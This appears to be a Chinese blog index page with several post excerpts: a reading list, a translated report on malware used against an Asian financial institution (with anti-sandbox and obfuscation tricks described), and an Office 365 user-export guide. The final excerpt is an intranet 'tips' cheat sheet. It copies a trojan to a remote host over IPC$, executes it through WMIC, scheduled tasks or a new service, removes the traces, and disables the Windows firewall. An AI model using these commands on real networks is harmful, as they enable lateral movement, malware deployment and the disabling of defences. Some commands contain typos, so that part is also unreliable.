1、《鸟哥的私房菜(服务器架设篇)》30%

2、《黑客与画家》完!

3、《史蒂夫·乔布斯传完!

4、《黑客大曝光:Web应用程序安全(原书第三版)》30%

More...

source:http://www.cyphort.com/multiple-malwares-used-to-target-an-asian-financial-institution/

0x00 前言


近来, Cyphort Labs已收到多种针对于亚洲某金融机构的恶意软件,由于某进行中的研究,我们将匿名该公司.

来源已经表明,攻击的起始入口为其中一名雇员打开了某收到的鱼叉式钓鱼邮件,攻击涉及到了多种后门和用于窃取信息的木马。一些恶意软件具有反沙盒属性且含有对抗heuristic signatures(一般被反病毒公司使用)的保护.多种恶意软件样本也展示了某种一般性的主题,例如:将自身安装到%ProgramFiles%%UserProfile%文件夹(取决于用户是否有admin特权)中.此外,多数的恶意软件样本是用Borland Delphi编译的,它们带有已加密的字符串和API字符串(被混淆或被分为多个字符串)作为保护以对抗heuristic signatures技术.除了某个样本外,其它样本都没被加壳。

以文件的创建日期为根据,它的出现早于2015年2月,并已持续了三个多月

clip_image001[5]

在该攻击中使用的样本概要

技术分析

clip_image002[4]

clip_image003[4]

0x01 技术分析


GoogleUpdate.exe

今天,流行的恶意软件中,文件的文件结构通常并不像我们看到的那样.为什么?因为在今天,多数AV产品部署了基于启发式的检测技术(检测加壳样本和某些具有非常规文件结构的样本).该恶意软件没被加壳且区段类似于某正常文件.

被加密的字符串只在被使用前解密.恶意软件通常将其API字符串分为多个字符串.这也为了躲避heuristic signatures(检测字符串和可疑APIs).

clip_image004[4]

如果用户有admin特权,则它将其自身副本移动到%Pr0gramFiles%文件夹中.如果不是则不移动 如果具有admin特权:

%ProgramFilesDir%\Windows NT\Accessories\nt\GoogleUpdate.exe

如果不具有admin特权:

%UserProfile%\Applications\GoogleUpdate.exe

它作为某种服务(带有”SENSS”服务名)安装自身.

clip_image005[4]

在检查(它是否成功作为某种服务在运行)之后,检查父进程是否为explorer.exe或iexplore.exe.该dll被加密(通过XOR 0x89作为密钥)

反沙盒

检测Sleep加速功能

为了挫败沙盒,该恶意软件凭借sleeps或loops拖延恶意软件的执行,因为他知道某沙盒系统将会在限制的短时间内执行恶意软件.

通过对比,一旦位于你的系统内,恶意软件将有大量时间来实现它的恶意意图。为了挫败该保护,沙盒系统部署了加速功能, 即如果他们检测到某样本使用某种延迟技术,它将加速该样本的执行.例如,如果它检测到该样本sleeps一分钟那么该系统将其改为sleeps 1秒。不幸的是, 对该恶意软件来说,这种技术已经不起作用了.该恶意软件可通过发布某个sleep以检测到sleep的加速,之后在得到消逝时间的同时检查消逝的时间是否比sleep的时间短

clip_image006[4]

More...

讲两种方法导出,导出用户信息是不包括用户密码的。

一、在线导出用户

当然首先得管理员权限登录Office365,菜单里打开Admin页面

clip_image001

打开ADMIN –> Exchange

clip_image002

More...

内网的一点TIPS…

copy muma.exe \\host\c$\windows\temp\foobar.exe     ##IPC拷贝木马文件

 

WMIC远程运行命令

wmic /node:host /user:administrator /p 密码 process call create “c:\windows\temp\foobar.exe” 

 

schtasks计划任务远程运行

schtasks /create /tn foobar /tr c:\windows\temp\foobar.exe /sc once /st 00:00            /S host /RU System 

schtasks /run /tn foobar /S host 

schtasks /F /delete /tn foobar /S host ##清除schtasks

 

SC添加服务远程运行命令

sc \\host create foobar binpath=“c:\windows\temp\foobar.exe”    ##新建服务,指向拷贝的木马路径 

sc \\host start foobar        ##启动建立的服务 
sc \\host delete foobar    ##完事后删除服务

Win08+ 防火墙服务名为mpssvc,想停掉防火墙远程登录一般运行如下命令:
C:\Windows\system32>net stop mpssvc
Windows Firewall 服务正在停止.
Windows Firewall 服务已成功停止。

但是在08里 直接停止防火墙的服务后,是不允许3389外连的

所以不能粗暴的停止服务,正确关闭防火墙的命令如下:


关闭WINDOWS防火墙策略:

NetSh Advfirewall set allprofiles state off

开启WINDOWS防火墙策略:

NetSh Advfirewall set allrprofiles state on

查看WINDOWS防火墙策略:

Netsh Advfirewall show allprofiles